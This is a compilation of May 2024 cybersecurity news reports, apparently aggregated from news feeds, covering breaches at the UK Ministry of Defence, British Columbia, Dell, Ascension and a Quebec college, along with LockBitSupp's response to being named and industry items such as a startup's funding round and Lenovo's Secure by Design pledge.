The U.K. military faced a data breach in which the information of serving UK military personnel was obtained. The attack targeted the Ministry of Defence’s payroll system, so information such as names and bank details, and in some cases addresses, was gathered. The hacker behind it is as yet unknown, but the Ministry has taken immediate action. The "personal HMRC-style information" of current and former members of the Royal Navy, Army and Royal Air Force was targeted. The Ministry of Defence is currently providing support for the personnel whose information was exfiltrated, which also involves informing veterans’ organisations. Defence Secretary Grant Shapps is expected to announce a "multi-point plan” when he updates MPs on the attack. Read More

India’s current election sees deepfakes, Prime Minister Modi calls for arrests of political parties responsible

India’s current Prime Minister Modi has announced that fake videos of him and other leaders making “statements that we have never even thought of” have been circulating. This election, dubbed India’s first AI election, has led to police investigations of opposition parties accused of making these videos, with Modi calling for arrests. Prior to this, investigations into fake videos of Bollywood actors criticising Modi were also under way. In the current case, around nine people have been arrested, six of whom are members of Congress’ social media teams. Five of them have been released on bail, but higher-ranking social media members have also been arrested. The tag #ReleaseArunReddy has been trending in support of Congress national social media co-ordinator Arun Reddy, who had shared the fake videos.

Germany and Poland accuse Russian Military Service of cyber-attacks

Germany has stated that an attack on its Social Democratic Party last year was carried out by a threat group believed to be linked to Russian military intelligence. German Foreign Minister Annalena Baerbock said at a news conference in Australia that APT28, a threat group also known as Fancy Bear, has been “unambiguously” confirmed to have been behind the cyberattack. Poland has joined in support of Germany and said that it was targeted by APT28 too. Poland has not revealed any details about the attack it faced, while Germany says it is working to repair the damage caused. Baerbock stated that “it was a state-sponsored Russian cyber-attack on Germany, and this is absolutely intolerable and unacceptable and will have consequences.”

Ukraine unveils new AI-generated foreign ministry spokesperson

Ukraine has revealed an AI-generated spokesperson created to deliver official statements for the foreign ministry. The messages are written by humans, but the AI delivers them, moving animatedly and presenting herself as an individual who introduces herself as Victoria Shi. Victoria is modelled on a Ukrainian celebrity, Rosalie Nombre, who took part in her development and lent her appearance and voice to the AI. Ukraine’s foreign minister said she was developed for “saving time and resources,” and described her as a “technological leap that no diplomatic service in the world has yet made.” Read More

Singapore passes new amendment to their cybersecurity bill which regulates temporary, high-risk attacks

Singapore’s Parliament has passed a new amendment to the country’s Cybersecurity Law to keep pace with its evolving critical infrastructure and adapt to technological advances. The changes regulate Systems of Temporary Cybersecurity Concern (STCC), which cover systems that are most vulnerable to attack for a limited period. The Cyber Security Agency of Singapore (CSA) can also now oversee Entities of Special Cybersecurity Interest (ESCIs), because a failure in them would affect the nation’s security as a whole. With the country’s defence, public health and safety, foreign relations, and economy at stake, the Bill targets critical national systems only, leaving ordinary businesses unaffected. Read More

Eurovision becomes susceptible to cyberattacks as the world’s largest music competition takes place during conflict

The 68th Eurovision Song Contest is being held in Malmö, Sweden, this year amid tensions surrounding conflicts such as Israel and Gaza, and Russia and Ukraine. Security has been tightened: in 2019, hackers infiltrated the online stream of the semi-finals in Israel, displaying a missile-strike warning and images of attacks on Tel Aviv, the host city. There are several reports of possible attempts to hijack the broadcast, which over 167 million people tuned in to watch last year. The voting system could also be a concern with the finals approaching, but Malmö’s police chief says he is more worried about disinformation. The spokesperson for the contest stated that “We are working closely with SVT's security team and the relevant authorities and expert partners to ensure we have the appropriate measures in place to protect from such risks.” Read More

Wrap Up

This week we’ve seen militaries and governments being cyber-attacked, which is a reminder of how interconnected everything is. If big organisations are vulnerable to attacks, then so are we. TCE Cyberwatch hopes that everyone stays vigilant in the current climate of increased cyberattack risk, ensures they stay protected, and remains on the lookout for any threats that could affect them.

Cybersecurity Startup Treacle Raises About 40 million in Pre-Seed Round

By: Alan J
11 May 2024 at 01:50

Treacle cybersecurity startup

Treacle, a cybersecurity startup founded in 2021 by Subhasis Mukhopadhyay, Subhajit Manna, and Partha Das, has raised about 40 million in its pre-Series A funding round. This milestone underscores the company's rapid growth and recognition within the industry. Founded by three seasoned entrepreneurs, Treacle has pursued a deliberate mission to develop cutting-edge cybersecurity solutions that safeguard businesses from the ever-evolving threat landscape. With this latest injection of capital, the company plans to expand its product offerings, enhance its research and development capabilities, and further solidify its presence in the market.

The pre-seed funding round, which marks a significant milestone for the startup, is expected to propel Treacle's growth trajectory. The company's founders believe that this influx of capital will enable them to accelerate their goals. The funding was led by prominent investors who have shown a keen interest in Treacle's approach to tackling modern digital threats.

Treacle Offers Defensive Cyber Security Solutions

Treacle serves both private and government sectors with solutions developed through rigorous research. Subhasis Mukhopadhyay stated, “Our mission centers on safeguarding network infrastructures through early detection, containment, and deception of threats. We're committed to delivering unparalleled value in the market, ensuring our clients have access to premium security solutions affordably. Our goal is to establish ourselves as a market leader and create a safer cyber world within the next five to six years.”

The standout product of Treacle is the AI-Based Proactive Defense System with in-built Deception. This service is designed to protect businesses even after their firewalls and other defense layers have been breached. It works by tracking and analyzing attacker behavior in the early stages of an intrusion, then luring the attacker into a complex, containerized mirage network. This strategy not only keeps other systems safe but also allows the gathering of important data about the threat, which is used to provide early warnings to SOC analysts and help prevent an attack before it takes place.

Treacle also offers a range of other services, including Customized Honeypot Solutions, Network and Host-Based Intrusion Detection Systems, Insider Threat Detection Systems, and OT Network Security Systems. Additionally, the company conducts Cyber Security Audits and helps design security policies. Vikram Ramasubramanian, Partner at Inflection Point Ventures, highlighted Treacle's core strength in AI-Based Deception Technology, a cornerstone of its Defensive Cyber Security solutions. The company plans to introduce new features and enhancements that will further strengthen its security offerings and provide greater value to its clients.

Company Growth and Achievements

Since its inception, Treacle has achieved significant milestones. The firm secured the C3iHub Grant and the SISFS Grant in 2021 and 2022, respectively. Treacle also represented India under DPIIT and participated in a sponsored delegation trip to Dubai in 2022. It won a significant grant from the Department of Telecommunications, Government of India, in DCIS 2023, and was named the Best Student Led Startup in the AWS Campus Fund Grand Challenge 2023.

Treacle's journey began in June 2021, following the selection of its pioneering product idea for investment. Its approach to developing a Deception Technology solution caught the attention of C3iHub, leading to early funding. The team's dedication also resulted in securing the prestigious SISFS grant from the Government of India. Since July 2021, Treacle has been part of the IHub Programme, incubated at SIIC, IIT Kanpur, which has further strengthened its commitment to developing cybersecurity solutions that stand the test of time.

The company's founders are confident that this influx of capital will enable them to accelerate their innovation pipeline, build a stronger team, and ultimately drive greater value for their customers. The startup's vision is to empower organizations with advanced cybersecurity solutions that provide real-time protection against emerging threats. With this vision in mind, Treacle is poised to make a significant impact in the cybersecurity landscape, and this latest funding round is a testament to the company's potential for growth.

"Securing this funding allows us to accelerate our roadmap and bring our next-generation cybersecurity solutions to a wider audience," said Subhasis Mukhopadhyay, CEO of Treacle. "We are grateful for the support from our investors and are eager to continue our journey in making the digital world safer for everyone."

State Actor Made Three Attempts to Breach B.C. Government Networks

British Columbia Cyberattack

A state or state-sponsored actor orchestrated the "sophisticated" cyberattacks against British Columbia government networks, the head of B.C.’s public service revealed on Friday. Shannon Salter, deputy minister to the premier, disclosed to the press that the threat actor made three separate attempts over the past month to breach government systems, and that the government was aware of the breaches at the time, before finally making them public on May 8. Premier David Eby first announced on Wednesday that multiple cybersecurity incidents had been observed on government networks, adding that the Canadian Centre for Cyber Security (CCCS) and other agencies were involved in the investigation. In her Friday technical briefing, Salter refrained from confirming whether the hack was related to last month’s security breach of Microsoft’s systems, which was attributed to Russian state-backed hackers and resulted in the disclosure of email correspondence between U.S. government agencies. However, she reiterated Eby's comments that there is no evidence suggesting sensitive personal information was compromised.

British Columbia Cyberattacks' Timeline

The B.C. government first detected a potential cyberattack on April 10. Government security experts initiated an investigation and confirmed the cyberattack on April 11. The incident was then reported to the Canadian Centre for Cyber Security, a federal agency, which engaged Microsoft’s Diagnostics and Recovery Toolset (DaRT) due to the sophistication of the attack, according to Salter. Premier David Eby was briefed about the cyberattack on April 17.

On April 29, government cybersecurity experts discovered evidence of another hacking attempt by the same “threat actor,” Salter said. The same day, provincial employees were instructed to immediately change their passwords to ones at least 14 characters long. B.C.’s Office of the Chief Information Officer (OCIO) described this as part of the government's routine security updates. Given the ongoing nature of the investigation, the OCIO did not confirm whether the password reset was actually linked to the British Columbia government cyberattack, but said, "Our office has been in contact with government about these incidents, and that they have committed to keeping us informed as more information and analysis becomes available."

Another cyberattack was identified on May 6, with Salter saying the same threat actor was responsible for all three incidents.

The cyberattacks were not disclosed to the public until Wednesday late evening when people were busy watching an ice hockey game, prompting accusations from B.C. United MLAs that the government was attempting to conceal the attack.

“How much sensitive personal information was compromised, and why did the premier wait eight days to issue a discreet statement during a Canucks game to disclose this very serious breach to British Columbians?” the Opposition MLA Todd Stone asked.

Salter clarified that the cybersecurity centre had advised against public disclosure to prevent other hackers from exploiting vulnerabilities in government networks. She described three separate cybersecurity incidents, all involving efforts by the hackers to conceal their activities. Following a briefing of the B.C. NDP cabinet on May 8, the cyber centre agreed that the public could be notified.

Salter said that over 40 terabytes of data was being analyzed, but she did not specify whether the hackers targeted specific areas of government records such as health data, auto insurance or social services. The province stores the personal data of millions of British Columbians, including social insurance numbers, addresses and phone numbers. Public Safety Minister and Solicitor General Mike Farnworth told reporters Friday that no ransom demands were received, leaving the motivation behind the multiple cyberattacks unclear.

Farnworth said that the CCCS believes a state-sponsored actor is behind the attack based on the sophistication of the attempted breaches.

"Being able to do what we are seeing, and covering up their tracks, is the hallmarks of a state actor or a state-sponsored actor." - Farnworth

Government sources told CTV News that the various government ministries and agencies, and their respective websites, networks and servers, face approximately 1.5 billion “unauthorized access” or hacking attempts daily. The number has increased over the last few years, which is why the province budgets millions of dollars per year for cybersecurity. Salter confirmed the government spends more than $25 million a year to fortify its defenses and added that previous investments in B.C.'s cybersecurity infrastructure helped detect the multiple attacks last month.

Microsoft last month alerted several U.S. federal agencies that Russia-backed hackers might have pilfered emails sent by the company to those agencies, including sensitive information such as usernames and passwords. However, Salter did not confirm whether Russia-backed hackers are associated with the B.C. security breach.

Backdoors and Miners Amid eScan Antivirus Backdoor Exploit

10 May 2024 at 03:00

Recently, a wave of malware attacks has surfaced, exploiting vulnerabilities in the update mechanism of the eScan antivirus software. This eScan antivirus backdoor exploit distributes backdoors and cryptocurrency miners, such as XMRig, posing a significant threat to large corporate networks. In this blog, we’ll look into the details of this eScan antivirus backdoor exploit and […]

The post Backdoors and Miners Amid eScan Antivirus Backdoor Exploit appeared first on TuxCare.

The post Backdoors and Miners Amid eScan Antivirus Backdoor Exploit appeared first on Security Boulevard.

British Columbia Discloses Multiple ‘Cybersecurity Incidents’ Impacting Government Networks


British Columbia in Canada has faced multiple "sophisticated cybersecurity incidents" on government networks, the province's premier said this week. Premier David Eby emphasized in his Wednesday statement that there is presently no evidence of compromised sensitive information and that investigations are ongoing, with further work required to determine what data may have been accessed. While the attack's specific nature remains unclear, the "sophisticated" label and the involvement of government networks fans theories of espionage by a state-sponsored actor seeking political intelligence.

“I know the public will have many questions about these incidents, and we will be as transparent as we can without compromising the investigation. As this complex work proceeds, government will provide British Columbians with updates and information as we are able,” Eby said.

The provincial government's investigation involves the Canadian Centre for Cyber Security and other agencies, with the Office of the Information and Privacy Commissioner duly informed. Neither agency immediately responded to The Cyber Express’ request for comment.

Opposition’s Spar in the House

B.C.'s political adversaries engaged in heated debate during the question period on Thursday morning, a day after the province disclosed the multiple cybersecurity incidents within its networks. British Columbia United MLA Todd Stone criticized the government, alleging it "concealed a massive cyberattack on the provincial government for eight days." Stone’s accusations came against the backdrop of a memo from the Office of the Chief Information Officer that directed all provincial employees to immediately change their passwords.

"British Columbians are rightly concerned about their sensitive information, questioning whether it has been compromised by a foreign, state-sponsored cyberattack. So, I ask the premier today: Will he reveal who was responsible for this attack?" Stone demanded. Stone pointed to the timing of Eby's Wednesday statement, suggesting it was issued discreetly "while everyone was preoccupied with last night’s Canucks game."

(Image: BC United MLA Todd Stone arguing in the House during the QP on Thursday morning. Credit: Legislative Assembly of B.C.)
“How much sensitive personal information was compromised, and why did the premier wait eight days to issue a discreet statement during a Canucks game to disclose this very serious breach to British Columbians?” the Opposition MLA asked.
In response to BC United's criticisms, Public Safety Minister Mike Farnworth accused Stone of "playing politics." “We take our advice from the Canadian Cyber Security Service, who deal with these kinds of things on an ongoing basis. That’s who we will take the advice from in terms of protecting public information, every single time. We will never take advice from the opposition — all they ever want to do is play politics,” Farnworth retorted amid uproar in the House.

(Image: Public Safety Minister Mike Farnworth addressing opposition queries. Credit: Legislative Assembly of B.C.)
“When an incident like this happens, the first thing that happens is the protection of the system, honourable speaker. The protection of the information that’s done by technical experts, honourable speaker, who work on the advice of the Canadian Cyber Security System,” Farnworth explained.
“And, honourable speaker, the reason they do that is because if you go out and give information before that’s done, you actually end up compromising people’s information, potentially.”

Multiple Cybersecurity Incidents Rock B.C. in Last Few Weeks

The latest revelation of cyberattacks on government networks comes on the heels of a string of cyberattacks facing Canada's westernmost province. B.C.-headquartered retail and pharmacy chain London Drugs announced on April 28 the closure of its stores across Western Canada after falling victim to a cybersecurity incident. The impact was such that it was forced to take even its phones offline, and pharmacies could only serve the “urgent” needs of patients on-site.

Addressing reporters later Thursday afternoon, Farnworth clarified that there was no evidence linking the multiple cybersecurity incidents targeting the province's networks to the event that closed London Drugs locations in the west for several days. "At present, we lack any information suggesting a connection. Once an incident is detected, technical security teams work swiftly to secure the system and ensure its integrity, while closely coordinating with the Canadian Cyber Security Service to address the situation," he explained. "While a comprehensive investigation involving multiple agencies is ongoing, we currently have no indication of any link to the London Drugs incident."

The same day the London Drugs cyberattack came to light, another western province entity, BC Libraries, reported a cybersecurity incident in which a hacker attempted to extort payment for data exfiltrated from its newly commissioned server and threatened to release that data publicly if no payment was received.

Is China Involved?

This development follows an official inquiry in Canada, revealing unsuccessful Chinese attempts to interfere in past elections. Beijing has refuted these allegations. The Canadian Security Intelligence Service (CSIS) recently published an annual report, warning of ongoing Chinese interference in Canadian political affairs, risking democratic integrity.
“Canada’s strong democratic institutions, advanced economy, innovative research sectors, and leading academic institutions make Canada an attractive target for cyber-enabled espionage, sabotage, and foreign influenced activities, all of which pose significant threats to Canada’s national security,” the report said.
The report identified China as a state-based threat conducting widespread cyber espionage across various sectors, including government, academia, private industry, and civil society organizations.

Cyberattack Paralyzes 4 Quebec CEGEPs: Classes and Exams Cancelled

Cégep de Lanaudière cyberattack

A recent cyberattack on Cégep de Lanaudière has paralyzed the college's operations, bringing classes to a halt and prompting exam cancellations that affect around 7,000 students. The attacker targeted the college network's servers and rendered Omnivox inaccessible; Omnivox is the primary digital platform for both faculty and student communication. Students logging into Omnivox were met with a disconcerting sight: a flood of images, some of them highly inappropriate. Classes at the affected CEGEPs – Lanaudière, L'Assomption, Joliette, and Formation Continue – remain suspended while cybersecurity experts mitigate the cyberattack on Cégep de Lanaudière.

Decoding the Cégep de Lanaudière Cyberattack

In a Sunday communication to students and staff, college management emphasized the need for external cybersecurity expertise to investigate the attack's origins and, if feasible, close the breach. "The investigation is ongoing. Data compromise is not a current concern," said Marilyn Sansregret, spokesperson for Cégep régional de Lanaudière, CBC reported.

However, hopes for a swift resolution were dashed when students were informed on Tuesday evening that the suspension of classes would extend until at least Friday. Sansregret affirmed that the IT department is working tirelessly to reinforce the college's digital defenses, but said it is too early to anticipate a return to normal. The Cyber Express has sought a response from Cégep de Lanaudière regarding the cyberattack. At the time of writing, no official statement or response has been shared, and the identity of the threat actor remains unknown.

Cyberattacks on Education Institutions and Universities

Meanwhile, Academica Group weighed in on the crisis, highlighting the profound impact of the cyberattack. Cégep de Lanaudière temporarily closed its campuses in Joliette, L’Assomption, Terrebonne, and Repentigny as it grappled with the aftermath of the intrusion. While the full extent of the Cégep de Lanaudière cyberattack is unknown, a music school on the Joliette campus reported disruptions to essential services like lighting, heating, ventilation, and fire alarms.

In a broader context, the surge in cyberattacks against educational institutions highlights the acute vulnerability of academic infrastructure to digital threats. Verizon's 2024 Data Breach Investigations Report reveals a staggering increase in attacks targeting the educational services sector. With ransomware emerging as the preeminent external threat and internal vulnerabilities compounding the security challenges facing education institutions, the need for preemptive cybersecurity measures cannot be overstated.

This is an ongoing story and The Cyber Express will be closely monitoring the situation. We’ll update this post once we have more information on the Cégep de Lanaudière cyberattack or any further information from the organization.

Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

LockBitSupp Denies Identification of Group ‘Admin’, Opens Contest to Find Named Dmitry Yuryevich

By: Alan J
10 May 2024 at 04:11

In an unexpected turn of events, LockBitSupp, the administrator of the notorious LockBit ransomware group, responded publicly to the Federal Bureau of Investigation (FBI) and international law enforcement's efforts to identify and apprehend him. After bringing back previously seized domains, law enforcement identified Dmitry Yuryevich Khoroshev as the mastermind behind the LockBit operations in an earlier public announcement. This was followed by official sanctions issued by the U.S., U.K., and Australia, accompanied by 26 criminal charges ranging from extortion to hacking, collectively carrying a potential maximum sentence of 185 years imprisonment. The Justice Department has also offered a staggering $10 million reward for information leading to Khoroshev's capture. However, LockBitSupp denied the allegations and attempted to turn the situation into a peculiar contest on the group's remaining leak site.

LockBitSupp Opens Contest to Seek Contact with Individual

The LockBit admin made a post on the group's leak site about a new contest (contest.omg) to encourage individuals to attempt to contact Dmitry Yuryevich Khoroshev. The announcement asserts that the FBI is wrong in its assessment and that the named individual is not LockBitSupp. The announcement attributes the alleged misidentification to an unfortunate mixing of the named individual's cryptocurrency with the ransomware admin's own funds, which they claim must have attracted the attention of the FBI. Cryptocurrency mixing blends different streams of potentially identifiable cryptocurrency to provide further anonymity for transactions.

The contest brazenly invites participants to reach out to the individual believed to be Dmitry Yuryevich Khoroshev and report back on his wellbeing for $1000. The ransomware admin claimed that the first person to provide evidence such as videos, photos, or screenshots confirming contact with the "poor guy," as LockBitSupp refers to him, would receive the reward.

Image: LockBitSupp contest announcement (Source: X.com, @RedHatPentester)

Participants were instructed to send their findings through the encrypted messaging platform Tox, using a specific Tox ID provided by LockBitSupp.

LockBitSupp Shares Details of Named Individual

In addition to the contest details, LockBitSupp shared multiple links to LockBit-associated file-sharing services on the dark web, presumably for individuals to archive gathered details and submit them as contest entries. They also listed extensive personal details alleged to belong to Dmitry Khoroshev, including email addresses, a Bitcoin wallet address, and passport and tax identification numbers.

Amid the defiance and contest announcement, LockBitSupp expressed concern for the well-being of the person they claim has been mistakenly identified as them, urging Dmitry Yuryevich Khoroshev, if alive and aware of the announcement, to make contact. This unusual move by LockBitSupp attempts to challenge the statement made by law enforcement agencies and underscores the complex dynamics of the cyber underworld, where hackers taunt their pursuers openly.

LockBitSupp emphasized that the contest will remain relevant as long as the announcement is visible on the blog. The admin hinted that there may be similar contests in the future with more substantial rewards, urging followers to stay tuned for updates. The announcement was uploaded and last updated on May 9, 2024, UTC, leaving the public and the cybersecurity community watching closely for further developments.

In a recent indictment, Khoroshev was identified as being behind LockBit's operations and as having functioned as the group's administrator since September 2019. Khoroshev and the LockBit group were stated to have extorted at least $500 million from victims in 120 countries across the world. Khoroshev was stated to have received around $100m from his part in this activity.

Dell Warns Customers of Data Breach: Threat Actor Claims 49M Records Compromised

Dell has issued a warning to its customers regarding a data breach following claims by a threat actor of pilfering information for roughly 49 million customers. In an email sent to customers, the computer manufacturer disclosed that a Dell portal containing customer data associated with purchases had been compromised. "We are presently investigating an incident involving a Dell portal, housing a database containing limited types of customer information linked to Dell purchases," stated a Dell data breach notification. Dell clarified that the accessed information encompassed:
  • Names
  • Physical addresses
  • Dell hardware and order details, comprising service tags, item descriptions, order dates, and relevant warranty information
The company said the stolen data did not encompass financial or payment data, email addresses or phone numbers. Dell assured customers that it is collaborating with law enforcement and a third-party forensics firm to probe the matter.

Image: Dell data breach notification

Dell Technologies is a publicly traded company that operates in 180 countries and is headquartered in Round Rock, Texas. Dell is the third-largest personal computer vendor in the world by unit sales, behind Lenovo and HP, and serves more than 10 million small and medium-sized businesses and receives 500 million annual eCommerce visits. The tech giant generated revenue of $102.3 billion in 2023 and has over 500,000 commercial customers and 2,500 enterprise accounts.
Dell is ranked 31st on the Fortune 500 list in 2022 and is also the sixth-largest company in Texas by total revenue, according to Fortune magazine.

Dell Data Breach Data Set Appeared on Dark Web

Despite Dell's reassurances, the breach data was purportedly put up for sale on an underground hacker forum by a threat actor named “Menelik” on April 28. The threat actor claimed this data set contained up-to-date details of registered Dell servers, including vital personal and company information such as full names, addresses, cities, provinces, postal codes, countries, unique 7-digit service tags of systems, system shipment dates (warranty start), warranty plans, serial numbers (for monitors), Dell customer numbers and Dell order numbers.

The threat actor asserted that he was the sole possessor of this data, which entailed approximately 7 million records of individual/personal purchases, while 11 million belonged to consumer segment companies. The remaining data pertained to enterprise, partners, schools or unidentified entities. The threat actor also highlighted the top five countries with the most systems represented in the database: the United States, China, India, Australia and Canada.

The data, claimed to be sourced from Dell and containing details of 49 million customers and other systems between 2017 and 2024, aligned with the details outlined in Dell's breach notification. However, The Cyber Express could not confirm whether the two data sets are the same, as Dell did not immediately respond to our request for confirmation. Although the sale of the database appears to have ceased, the possibility of further exploitation remains.

Although Dell refrained from disclosing the specific impact of the breach, it remains vigilant about potential risks associated with the stolen information. While the compromised data lacks email addresses, threat actors could exploit it for targeted phishing and smishing attacks against Dell customers. They could contact Dell customers posing as customer service executives and lead them into downloading malware or infostealers, as seen in many previous campaigns.
Dell advises customers to exercise caution regarding any communications purportedly from Dell, especially those urging software installations, password changes or other risky actions, and encourages customers to verify the legitimacy of such communications directly with Dell.

Lenovo Joins Secure by Design Pledge, Enhancing Cybersecurity Standards

Lenovo has taken a bold step towards fortifying cybersecurity by joining the Secure by Design pledge, initiated by the US Cybersecurity and Infrastructure Security Agency (CISA). This collaborative endeavor, announced on May 8th, unites industry giants in a concerted effort to raise security standards across diverse tech sectors. With a comprehensive approach encompassing multi-factor authentication, vulnerability reduction, and robust supply chain security, Lenovo stands at the forefront of this initiative, highlighting the goals of Secure by Design.

Lenovo Joins CISA’s Secure by Design Pledge

The Secure by Design pledge targets key facets of enterprise technology, including software products and services, on-premises solutions, cloud services, and SaaS features. Participating companies, including Lenovo, pledge to make tangible strides across seven core focus areas. These encompass critical aspects such as multi-factor authentication (MFA), default password protocols, vulnerability reduction, security patching, vulnerability disclosure policies, common vulnerabilities and exposures (CVE), and intrusion evidence.

Doug Fisher, Lenovo's Chief Security Officer, expressed profound support for the pledge, emphasizing the critical importance of industry-wide collaboration in fortifying cybersecurity frameworks. "We commend CISA’s initiative to drive an industry-wide ‘secure by design’ pledge and welcome the opportunity to align our own well-established security by design approach with other industry best practices," stated Fisher. "It’s good for the industry that global technology leaders are able to share best practices, driving meaningful progress and accountability in security."

Lenovo's commitment to the Secure by Design pledge dovetails seamlessly with its existing security protocols. The company boasts a robust security infrastructure encompassing best-in-class practices across product development, supply chain management, and privacy initiatives. These include the implementation of the Security Development Lifecycle, a vigilant Product Security Incident Response Team (PSIRT), and stringent global supply chain security measures. "Our pledge transcends geographies and benefits all our global customers who face the same industry-wide security challenges US CISA seeks to address, including continued alignment with emerging security regulations around the world," remarked Fisher, underlining Lenovo's global outlook towards cybersecurity enhancement.

Global Cybersecurity Initiative

Lenovo's proactive stance positions it as a pioneer among the initial group of 68 companies committing to the Secure by Design pledge. These companies range from tech titans like Amazon Web Services, Cisco, Google, IBM, Microsoft, Palo Alto Networks, and Trend Micro to cybersecurity specialists such as Claroty, CrowdStrike, Cybeats, Finite State, Forescout, Fortinet, Rapid7, SentinelOne, Sophos, Tenable, Trend Micro, and Zscaler, all of which have endorsed the Secure by Design pledge.

The Secure by Design pledge highlights a voluntary commitment to advancing security measures within enterprise software realms, aligning with CISA’s overarching principles. While physical products like IoT devices and consumer goods fall outside the pledge's scope, participating companies pledge to diligently pursue the outlined goals over the ensuing year. Furthermore, the pledge encourages radical transparency, urging manufacturers to publicly document their progress and the challenges they encounter. This fosters a culture of accountability and knowledge sharing within the cybersecurity domain. In acknowledging the diversity of approaches, the pledge empowers software manufacturers to devise bespoke strategies tailored to their product portfolios. Companies exceeding the outlined goals are encouraged to share their methodologies, fostering an environment of continuous improvement and innovation.

International Baccalaureate Exam Hack Speculation Sparks Student Outrage

By: Alan J
9 May 2024 at 09:45

The International Baccalaureate Organization (IBO) confirmed a hacking incident, while clarifying that no ongoing exam papers were leaked despite claims online of a wider cheating scandal. The IB found students sharing exam details online before the completion of their ongoing tests globally, and simultaneously observed increased malicious activity targeting its computer networks. On investigating the online claims, IB found that the leaked data set appeared to be limited to earlier data from 2018, while the ongoing exam paper leaks could be a result of some students sharing exam papers online rather than a hack. Founded in 1968, the International Baccalaureate is a non-profit educational organization based in Geneva, Switzerland. It aims to provide high quality international education free of regional, political or educational agendas.

Exam Cheating Concerns Amidst International Baccalaureate Hack

Earlier last week, the International Baccalaureate had released an update stating that it was investigating online speculation about potential cheating by some students in the ongoing exams. The organization stated that while there was no evidence of widespread cheating, some students might have engaged in "time zone cheating". The organization defined time zone cheating as an action where students "who have completed their examinations share what they can recall from memory about the exam questions on social media before other students take the examination." Citing its own academic integrity policy, which forbids such behaviour, the organization stated that students engaging in such activity would not receive their Diploma certificates or grades and may potentially be banned from future exam retests.

Image: International Baccalaureate exam hack update (Source: Official Update)

After its initial investigations, the organization stated that it had experienced an increase in attempted malicious activity aiming to interfere with its systems. It also confirmed that some data from 2018, including employee names, positions, and emails, had been breached through a third-party vendor, and screenshots of this leaked data were shared online. However, the organization again clarified that at the time of the investigation, no recent exam material was found to be compromised. The notice further stated that IB was continuing to assess the incident and had taken steps to contain it. The organization mentioned that it would provide further information on the incident as the situation evolved. The Cyber Express team has reached out to the International Baccalaureate for further details, and a spokesman responded with a link to the second update notification.

Students Petition For Exam Cancellation

The exam is taken by nearly 180,000 students internationally. However, recent speculation over the hacking incident and cheating allegations has raised concerns among students and their parents, leading to an online petition demanding exam cancellation or a re-test. Amidst the speculation, the International Baccalaureate took action to remove leaked content and stated that cheaters would face severe consequences. Some condemned the leaks as failures in governance and urged improved exam security, prompting the IB to affirm its intention to stay ahead of technological threats while promoting academic integrity in the exam process. The IB further cautioned its authorized network of schools about data breaches and phishing attempts.

The leaked materials from the International Baccalaureate data breach were observed to have been downloaded over 45,000 times. The leaked content allegedly included mathematics and physics papers, which were widely circulated online, further raising doubts about exam integrity. It remains to be seen whether the student petition's demands for justice or the organization's observation of increased hacking attempts will lead to a further escalation of the situation.

Ascension Healthcare Hit by Cyberattack: Patients Wait Hours, Chaos Ensues

Ascension, one of the largest nonprofit healthcare systems in the United States, is facing disruptions in clinical operations due to a cyberattack that prompted the organization to take some of its systems offline. The organization detected unusual activity on select technology network systems on Wednesday, prompting an immediate response, the initiation of an investigation and the activation of remediation efforts. Consequently, access to certain systems has been interrupted during the ongoing investigation. The healthcare organization has advised its business partners to temporarily sever connections to its systems as a precautionary measure and said it would notify partners when it is safe to reconnect. The cyber incident has disrupted clinical operations, prompting an investigation into the extent and duration of the disruption. Ascension has notified relevant authorities about the cyberattack and enlisted the services of Mandiant incident response experts to aid in the investigation and remediation efforts.

Operating in 19 states and the District of Columbia, Ascension oversees 140 hospitals and 40 senior care facilities. It also boasts a significant workforce comprising 8,500 providers, 35,000 affiliated providers and 134,000 associates. In 2023, Ascension’s total revenue amounted to $28.3 billion.

Patients Say Chaos on Display at Ascension Healthcare

Talking about the disruptions at the healthcare facility, Ascension said, “Our care teams are trained for these kinds of disruptions and have initiated procedures to ensure patient care delivery continues to be safe and as minimally impacted as possible.” But the ground reality seems to be different, as per a patient account. Talking to local news media Fox 2, a patient named Zackery Lopez said “chaos” was on display this Wednesday in Ascension Providence Southfield hospital where he had to wait nearly seven hours to get a pain medication for his cancer resurgence.
“Right now it is crazy. Nurses are running around. Doctors are running around. There’s no computers whatsoever they can use,” Lopez said. “So, they’re actually using charts.”
Lisa Watson, a nurse at Ascension Via Christi St. Joseph in Wichita, Kansas, told another local news outlet that the hospital shut down its operating rooms on Wednesday following the cybersecurity issue. She also said that the system the hospital uses to scan patients' medications was down, along with their electronic charts.
“We are paper-charting all medications, and all lab orders are being hand-written and sent by pneumatic tube systems to the unit they’re supposed to go to,” said Watson.
Natalie Sirianni, an MD at one of the hospitals linked to Ascension, concurred on the chaos that ensued.
“No one knew where the forms were. Thank god we have a separate sign out with our pts (patients) meds. Nurses were writing them down from memory. This is a new reality we need to be better prepared,” Sirianni wrote on platform X.
She added that the EMR (Electronic Medical Records) was completely down, and that she had to do multiple rounds to make sure her patients got their meds and to check their vitals.
"No one knew where they (forms) were or which ones to use for hours. We need to have the forms ready to go to switch to paper charting. I left still not knowing how to place lab orders, talked with dozens of people from lab to phlebotomy to management, no one knew. No one was prepared and patients suffered."
“We have endless incessant modules about stupid policies to save hospitals money but never about downtime protocol,” she added.
Lopez is also concerned that his personal information was possibly at risk but said he has not received a convincing answer from the authorities yet. "They really didn’t tell me if it was protected or not," he said. "They really kind of just brushed it off when I asked them. They say they’re trying to get everything back on, back on track."

**Update on May 10, 1 AM ET**

The company in a Thursday update said that it did not have a definite timeline to restore systems that were pulled offline as a result of the cybersecurity incident.
“Systems that are currently unavailable include our electronic health records system, MyChart (which enables patients to view their medical records and communicate with their providers), some phone systems, and various systems utilized to order certain tests, procedures and medications.”
It added that patient care was being provided under established downtime protocols and procedures, in which Ascension's workforce is well trained. “It is expected that we will be utilizing downtime procedures for some time. Patients should bring to their appointment notes on their symptoms and a list of current medications and prescription numbers or the prescription bottles so their care team can call in medication needs to pharmacies,” the update said. As a precautionary measure, some non-emergent elective procedures, tests and appointments have been temporarily paused, and patients' appointments or procedures will need to be rescheduled.
“Due to downtime procedures, several hospitals are currently on diversion for emergency medical services in order to ensure emergency cases are triaged immediately.”

Healthcare Breaches on the Rise

